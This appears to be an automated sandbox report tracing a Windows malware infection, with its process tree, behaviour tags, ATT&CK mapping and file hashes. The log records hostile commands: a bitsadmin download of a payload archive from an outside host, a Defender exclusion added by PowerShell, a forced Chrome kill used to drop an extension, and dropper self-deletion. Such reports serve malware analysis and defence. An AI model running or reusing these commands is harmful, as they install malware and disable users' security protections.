C:\Users\Admin\Documents\2n4uJKOsf5g_eFvEolYXYnt6.exe"C:\Users\Admin\Documents\2n4uJKOsf5g_eFvEolYXYnt6.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\8594809.scr"C:\Users\Admin\AppData\Roaming\8594809.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\4023738.scr"C:\Users\Admin\AppData\Roaming\4023738.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4808953.scr"C:\Users\Admin\AppData\Roaming\4808953.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7435204.scr"C:\Users\Admin\AppData\Roaming\7435204.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4792116.scr"C:\Users\Admin\AppData\Roaming\4792116.scr" /S7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri14bdb9bff7a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri14bdb9bff7a.exeFri14bdb9bff7a.exe5⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"6⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7fff9dd54f50,0x7fff9dd54f60,0x7fff9dd54f707⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,8988039820630259132,18393906250516881447,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1648 /prefetch:87⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri141d31513022.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri141d31513022.exeFri141d31513022.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-8GPNB.tmp\Fri141d31513022.tmp"C:\Users\Admin\AppData\Local\Temp\is-8GPNB.tmp\Fri141d31513022.tmp" /SL5="$202A4,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri141d31513022.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-BIAOA.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-BIAOA.tmp\Sayma.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Windows Defender\LHZWGBAEIA\ultramediaburner.exe"C:\Program Files\Windows Defender\LHZWGBAEIA\ultramediaburner.exe" /VERYSILENT8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-5TDAR.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-5TDAR.tmp\ultramediaburner.tmp" /SL5="$3026C,281924,62464,C:\Program Files\Windows Defender\LHZWGBAEIA\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
C:\Users\Admin\AppData\Local\Temp\f8-d6930-09d-75ea5-2ac2c423fde09\Biguvajula.exe"C:\Users\Admin\AppData\Local\Temp\f8-d6930-09d-75ea5-2ac2c423fde09\Biguvajula.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\3f-d7ed6-76f-eda86-02419625ec80c\Loluxaehecy.exe"C:\Users\Admin\AppData\Local\Temp\3f-d7ed6-76f-eda86-02419625ec80c\Loluxaehecy.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mdtyytym.gvv\GcleanerEU.exe /eufive & exit9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\mdtyytym.gvv\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\mdtyytym.gvv\GcleanerEU.exe /eufive10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mdtyytym.gvv\GcleanerEU.exe" & exit11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ig3jme2u.dmi\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ig3jme2u.dmi\installer.exeC:\Users\Admin\AppData\Local\Temp\ig3jme2u.dmi\installer.exe /qn CAMPAIGN="654"10⤵
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ig3jme2u.dmi\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ig3jme2u.dmi\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633098592 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mqlq0vha.jvz\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\mqlq0vha.jvz\any.exeC:\Users\Admin\AppData\Local\Temp\mqlq0vha.jvz\any.exe10⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e2jn4qjg.4l1\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\e2jn4qjg.4l1\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\e2jn4qjg.4l1\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\e2jn4qjg.4l1\gcleaner.exe" & exit11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksgn0qqf.4as\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ksgn0qqf.4as\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\ksgn0qqf.4as\autosubplayer.exe /S10⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z11⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p4U0Ogx1iwngt6sq -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8bCt3dMBvx2nDod -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EhdpuqeT\EhdpuqeT.dll" EhdpuqeT11⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EhdpuqeT\EhdpuqeT.dll" EhdpuqeT12⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4675.tmp\tempfile.ps1"11⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri14def89ebdce1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri14def89ebdce1.exeFri14def89ebdce1.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri14db78c00155a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4609A268\Fri14db78c00155a.exeFri14db78c00155a.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 14A3DD3396301E72442A2DC39E93A6A1 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 78305B78B33BE235925DB6C4808255802⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F18216F081B3138D2F636C38A33934DF E Global\MSI00002⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C83E4F10408B7B8FF66A5943DBA3132A C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 181A0FEDB7C9E6211E2E475C8A01CFA92⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2F8777DDF96F652B1E4CCE789E2EE1F5 E Global\MSI00002⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 6243⤵
- Program crash
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc1⤵
-
C:\Users\Admin\AppData\Local\Temp\6F72.exeC:\Users\Admin\AppData\Local\Temp\6F72.exe1⤵
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\BB3.exeC:\Users\Admin\AppData\Local\Temp\BB3.exe1⤵
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\b1019046-0f6a-4e93-b037-0a21359811b2\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b1019046-0f6a-4e93-b037-0a21359811b2\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b1019046-0f6a-4e93-b037-0a21359811b2\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Users\Admin\AppData\Local\Temp\b1019046-0f6a-4e93-b037-0a21359811b2\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b1019046-0f6a-4e93-b037-0a21359811b2\AdvancedRun.exe" /SpecialRun 4101d8 7283⤵
-
C:\Users\Admin\AppData\Local\Temp\BB3.exe"C:\Users\Admin\AppData\Local\Temp\BB3.exe"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\BB3.exe" -Force2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Local\Temp\BB3.exe"C:\Users\Admin\AppData\Local\Temp\BB3.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\1C6D.exeC:\Users\Admin\AppData\Local\Temp\1C6D.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Users\Admin\AppData\Local\Temp\2EED.exeC:\Users\Admin\AppData\Local\Temp\2EED.exe1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\391F.exeC:\Users\Admin\AppData\Local\Temp\391F.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\391F.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\56BA.exeC:\Users\Admin\AppData\Local\Temp\56BA.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
- Drops desktop.ini file(s)
- Modifies data under HKEY_USERS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
3Bootkit
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
8Disabling Security Tools
4Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Google\Temp\GUMC729.tmp\GoogleCrashHandler.exeMD5
02df1e835008ceb9ae725661c10ce5b0
SHA1947a182253038c52196972d6e120ec2d4146e2ce
SHA256413771b6008a8586383a918019345e431e576cc0f3638dff2fa7af73311de507
SHA512c72326cbaffb1c3087a3b525dd670872162ccf5552f398deefec421a278770a1ebffdc9f1978528f03f52f3e7fc5ecbefee755ed4ce4b0a06549e4889bcb0d74
-
C:\Program Files (x86)\Google\Temp\GUMC729.tmp\GoogleCrashHandler64.exeMD5
927575e60a8c1864b0276a8b5473028a
SHA1f50a215ae8cf5c7bfa83f18275ab5eafe1c9268c
SHA256070875d941aaf2a4a01cd61dfbd1f7122b9bc4b6030341999e4c1aadcf93f271
SHA51240e4564ef65e1d093a43784a97b90f1da14cdabae0935b5f65c36992b3bf4294c7c61865c61c27db3dc40c0b2ce905b7d2a1dee5987fe29e306ab854eb4eebb8
-
